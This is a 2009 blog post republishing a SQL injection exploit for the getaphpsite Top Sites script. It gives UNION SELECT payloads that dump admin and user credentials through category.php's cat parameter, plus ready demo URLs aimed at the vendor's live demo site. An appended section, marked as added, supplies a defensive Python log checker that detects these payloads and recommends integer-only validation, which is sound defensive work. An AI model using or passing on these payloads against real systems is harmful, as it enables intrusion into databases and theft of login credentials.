"The Devil Is the Voice Within; Listen to That Voice"

-Zorlu BUĞRAHAN-

Thursday, 1 January 2009

getaphpsite Top Sites (cat) Remote SQL Injection




link: http://packetstormsecurity.org/0812-exploits/topsites-sql.txt

link: http://www.exploiter5.com/all.php?id=60

Exploit:

http://z0rlu.blogspot.com/script/category.php?cat=[SQL1] or [SQL2]

[SQL1]=

3+union+select+1,concat(username,0x3a,password),3,4,5+from+admin

[SQL2]=

3+union+select+1,concat(username,0x3a,password),3,4,5+from+users

Demo:

http://www.getaphpsite.com/demos/topsites/category.php?cat=3+union+select+1,concat(username,0x3a,password),3,4,5+from+admin

or

http://www.getaphpsite.com/demos/topsites/category.php?cat=3+union+select+1,concat(username,0x3a,password),3,4,5+from+users
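Added example, not part of the original post or of the getaphpsite code: a log check a site operator could run to find requests that put anything other than a plain integer into the cat parameter of category.php, including the UNION SELECT strings listed above. It assumes cat is meant to be a numeric category ID and that the server writes common/combined-format access logs; the log lines, IP addresses and the /topsites/ path are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2009:10:00:01 +0000] "GET /topsites/category.php?cat=3 HTTP/1.1" 200 5120
192.0.2.77 - - [01/Jan/2009:10:00:09 +0000] "GET /topsites/category.php?cat=3+union+select+1,concat(username,0x3a,password),3,4,5+from+admin HTTP/1.1" 200 5342
192.0.2.77 - - [01/Jan/2009:10:00:15 +0000] "GET /topsites/category.php?cat=3%20UNION%20SELECT%201,concat(username,0x3a,password),3,4,5%20FROM%20users HTTP/1.1" 200 5342
192.0.2.10 - - [01/Jan/2009:10:01:00 +0000] "GET /topsites/index.php HTTP/1.1" 200 2048
"""

# Client IP at line start, then the request target inside the quoted request line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate cat value is one or more ASCII digits.
INTEGER_RE = re.compile(r"[0-9]+")
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)


def suspicious_cat_requests(log_text):
    """Return (client_ip, decoded_cat, reason) for every category.php
    request whose cat parameter is not a plain integer."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client_ip, target = match.groups()
        url = urlsplit(target)
        if not url.path.endswith("/category.php"):
            continue
        # parse_qs decodes both '+' and %XX, so differently encoded
        # variants of the same string normalise to identical text.
        for value in parse_qs(url.query, keep_blank_values=True).get("cat", []):
            if INTEGER_RE.fullmatch(value):
                continue
            reason = "union-select" if UNION_RE.search(value) else "non-integer"
            findings.append((client_ip, value, reason))
    return findings


if __name__ == "__main__":
    for ip, value, reason in suspicious_cat_requests(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{value}")
```

The same integer-only rule, enforced in the application before the value reaches the database query, is the fix for this class of bug; the log check only shows who has already tried it.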
